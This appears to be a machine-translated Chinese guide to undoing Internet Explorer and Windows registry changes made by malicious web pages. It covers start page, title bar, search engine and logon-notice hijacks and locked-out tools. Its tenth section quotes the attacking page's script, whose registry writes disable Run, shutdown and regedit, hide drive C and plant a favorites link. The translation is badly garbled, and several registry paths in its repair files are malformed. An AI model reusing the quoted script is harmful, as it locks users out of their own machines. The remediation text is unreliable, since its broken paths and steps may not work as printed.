The solution that is hit by malicious website--the registration form uses the entire introduction six _ registration Form

The solution to be hit by a malicious website--the registration form uses the entire strategy six

The reasons for the modification of the registration form and the solutions

A malicious Web page is an ActiveX Web file containing harmful code that appears because the browser's registry was maliciously altered.

1, ie default connection home was modified

The title bar above IE browser is changed to "Welcome to visit ...". Web site style, the registry entry that was changed is:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
By modifying the key value of "Start Page", the purpose of modifying IE default connection Home page is achieved
① after Windows starts, click the "start" → "Run" menu, type regedit in the "Open" field, and press "OK".
② Expand the registry to
Under the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main,
The string value "Start Page" is found in the right half window, and the key value is changed to "About:blank".
③ Similarly, expand the registry to
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
The string value "Start Page" is found in the right half window, and then processed by the method described in ②.
④ quit Registry Editor, restart the computer, everything OK!
Special example: When IE's starting page becomes a certain URL, even if you modify the settings through the options, restart will become their web site, very difficult. In fact, they are in your machine to add a self running program, it will start the system will be your IE start page to their site.
Workaround: Run Registry Editor Regedit.exe, and then expand
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run The primary key, then deletes the Registry.exe subkey under it, and then deletes the running program C:\Program Files\registry.exe, finally reset the start page from the IE option.

2, tampering with IE's default page

Some IE have been changed to the start page, even if the "Use default page" is set still invalid, because the IE start Page's default page has also been tampered with. The following registry key was modified:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\main\default_page_url
The key value of the subkey, "Default_Page_URL", is the default page for the start page.
Solution:
Change the Web site's URL in the "Default_page_ur" key value.

3, modify IE Browser default home page, and lock settings, prohibit users to change back.

The main is modified in the registry of IE settings in the following key values (DWORD value is 1 is not optional):
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"Settings" =dword:1
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"Links" =dword:1
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"Secaddsites" =dword:1
Workaround: Change the above DWORD value to "0" to restore the function.

4, IE's default home page Gray button is not optional

Due to hkey_users\. Default\software\policies\microsoft\internet Explorer\Control Panel under the DWORD Value "Homepage" The key value was modified for the sake of. The original key value is "0" and is modified to "1" (that is, the gray-not-selectable state).
WORKAROUND: Change the key value of "homepage" to "0".

5, IE title bar was modified

In the default state of the system, the application itself provides information about the title bar, but it also allows users to add information to the registry entries themselves, and some malicious websites take advantage of this: they change the key values under String window title to their website name or more advertising information, So as to change the viewer IE title bar.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\main\window Title
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\main\window Title
Solution:
① after Windows starts, click the "start" → "Run" menu item, type regedit in the "Open" field, and then press "OK" button;
② Expand the registry to
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main, the String value "window Title" is found in the right half window, the string value is deleted, or the window The key value of title changed to "IE browser" and so you like the name;
③ Similarly, expand the registry to
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main, according to the method described in ②.
④ Exit Registry Editor, restart the computer, run IE, you can

6, IE right button menu was modified

The registry entries that were modified are:
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\menuext is created under the new Web page advertising information, and thus in the IE right-click menu appears!
WORKAROUND: Open the registration Mark editor and find
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\menuext, delete the relevant advertising provisions, pay attention not to download software flashget and netants also deleted, these two are normal.

7, ie default search engine was modified

In IE browser's toolbar has a search engine's tool button, can realize the network search, is tampered with only then clicks that Search Tool button to link to that tampering website. This behavior occurs because the following registry is modified:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\search\customizesearch
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\search\searchassistant
Solution:
Run Registry Editor, expand the subkey above, and change the key value of "Customizesearch" and "searchassistant" to the URL of a search engine.

8. Pop-up dialog box when system starts

The registry entries that were changed are:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon was built under its string "LegalNoticeCaption" and " LegalNoticeText ", where" legalnoticecaption "is the caption of the balloon, and" LegalNoticeText "is the text content of the prompt box. They exist, we have to log on every time before the WINDWOS desktop has a prompt window, display those web page advertising information.
Workaround: Open Registry Editor and find
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon primary Key, find "legalnoticecaption" and "in the right window" LegalNoticeText "These two strings, delete it.

9. Browsing the Web page registry is disabled

This is due to the registration form
The DWORD value "DisableRegistryTools" under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System is modified to " 1 ", restore its key value to" 0 ".
Workaround: Use a Notepad program to create a file with a suffix named Reg, and copy the following content to it:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools" =dword:00000000

10, browsing the Web Start menu has been modified

1 Prohibit "shutdown system" 2) prohibit "Run"
3) Prohibit "logout" 4 hide C disk-Your C disk can not find!
5 Prohibit use of Registry Editor regedit 6) prohibit the use of DOS programs
7 prevents the system from entering "real mode" 8) prohibit running any program

Note: The following are the tricks used by the Web page to modify the victim's registry entries
Shl.regwrite ("Hkcu\\software\\microsoft\\windows\\currentversion
\\Policies\\Explorer\\NoRun ",", "reg_binary");
Note: There is no "run" item on the victim system so that users cannot modify the system registry by using Registry Editor.
Shl.regwrite ("Hkcu\\software\\microsoft\\windows\\currentversion\policies\\explorer\\noclose", "REG_BINARY") ;
Note: There is no "shut down system" entry for the victim system
Shl.regwrite ("Hkcu\\software\\microsoft\\windows\\currentversion\policies\\explorer\\nologoff", "REG_BINARY") ）;
Note: The victim system is not "unregistered"
Shl.regwrite ("Hkcu\\software\\microsoft\\windows\\currentversion\policies\\explorer\\nodrives", "00000004", "REG" _dword ");
Note: Make the victim system without logical drive C
Shl.regwrite ("hkcu\\software\\microsoft\\windows\\currentversion\policies\\winoldapp\\ Disabled", "REG_BINARY");
Note: Prohibit all DOS applications from running;
Shl.regwrite ("Hkcu\\software\\microsoft\\windows\\currentversion\policies\ \winoldapp\\norealmode", "REG_BINARY" ）;
Note: Enable the system to not boot to the "real mode" (traditional DOS mode);
Also note: When you go to the Web page, it also modifies the following registry key to display a login window when the Windows system logs on (before the Microsoft Network user logs on)
Shl.regwrite ("Hklm\\software\\microsoft\\windows\\currentversion\winlogon\\legalnoticecaption", "Woo la la ...");
Note: The code will cause the window title to be "Woo la La ..."
Shl.regwrite ("Hklm\\software\\microsoft\\windows\\currentversion\winlogon\\legalnoticetext", "Woo la La ...")
Note: The above line is the text that will appear in the window
Note: The following two lines of code modify the registry so that all of the victim's IE windows are added with the following title: "Woo La La ..."
Shl.regwrite ("Hklm\\software\\microsoft\\internet explorer\\main\window Title", "Woo la la ...");
Shl.regwrite ("Hkcu\\software\\microsoft\\internet explorer\\main\window Title", "Woo la la ...");
Note: All modifications to the victim's registry have been completed by the previous line!
Note: The following code is used to add its web page to the victim's favorites
var WF, Shor, loc;
WF = FSO. GetSpecialFolder (0);
LOC = WF + "\\Favorites";
if (! Fso. FolderExists (Loc))
{
loc = FSO. GetDriveName (WF) + "\\Documents and Settings\" + Net.username + "\\Favorites";
if (! Fso. FolderExists (Loc))
{
Return
}
}

Note: The following is the specific code that adds the Web page to your favorites
Addfavlnk (Loc, "Find the Feeling www.findfeel.com", "http://www.findfeel.com")

How to fix an injured user:
1: For Win9x users, it is recommended to press F8 when the computer is started, select to MS-DOS, and use the Scanreg/restore command to restore the previously backed up, normal registry.
2: For Win2000 users, the following content copy down, save as Unlock.reg file, select the security mode with command line, with command regedit unlock.reg import, how to restart the machine OK.
The contents of the Unlock.reg file are as follows:
Windows Registry Editor Version 5.00
[Hkey_current_user\software\microsoft\windows\currentversionpolicies\explorer]
"NoDriveTypeAutoRun" =dword:00000095
"NoRun" =hex:
"Nologoff" =hex:
"NoDrives" =dword:00000000
"Restrictrun" =dword:00000000

[Hkey_current_user\software\microsoft\windows\currentversionpolicies\system]
"DisableRegistryTools" =dword:00000000

[Hkey_current_user\software\microsoft\windows\currentversionpolicies\system]
"DisableRegistryTools" =dword:00000000

[Hkey_current_user\software\microsoft\windows\currentversionpolicies\winoldapp]
"Disabled" =dword:00000000

[Hkey_current_user\software\microsoft\windows\currentversionpolicies\winoldapp]
"Norealmode" =dword:00000000

[Hkey_local_machine\software\microsoft\windows\currentversionwinlogon]
"LegalNoticeCaption" = ""
"LegalNoticeText" = ""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Window Title" = "IE Browser"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Window Title" = "IE Browser"

11, IE in the right mouse button failure
After browsing the Web page in IE, the right mouse button failure, click the right button without any response!

12, view the "source file" menu is disabled

Click "View" → "source file" in IE window, the "source file" menu has been disabled. The specific location is: in the registry
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer under the "Restrictions", and then in "restrictions" The following establishes two DWORD values: "Noviewsource" and "Nobrowsercontextmenu", and assigns the two DWORD values to "1".
In the registry
Hkey_users\. Default\software\policies\microsoft\internet Explorer\Restrictions, two DWORD values: "Noviewsource" and " Nobrowsercontextmenu "The key value is changed to" 1 ".
Solution:
Save the following as a registry file with a suffix named Reg, such as Unlock.reg, double-click Unlock.reg to import the registry, and rerun IE to return to normal.
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions]
"Noviewsource" =dword:00000000
"Nobrowsercontextmenu" =dword:00000000
[Hkey_users\. Default\software\policies\microsoft\internet Explorer\Restrictions]
"Noviewsource" =dword:00000000
"Nobrowsercontextmenu" =dword:00000000
To pay special attention is, in your registry file Unlock.reg, "REGEDIT4" must be capitalized, and it must be empty line behind, and, "REGEDIT4" in the "4" and "T" between must not have a space, otherwise will be naught! Note If you are a Win2000 or WinXP user, change "REGEDIT4" to Windows Registry Editor Version 5.00.
>
(Source: Hotspot Network)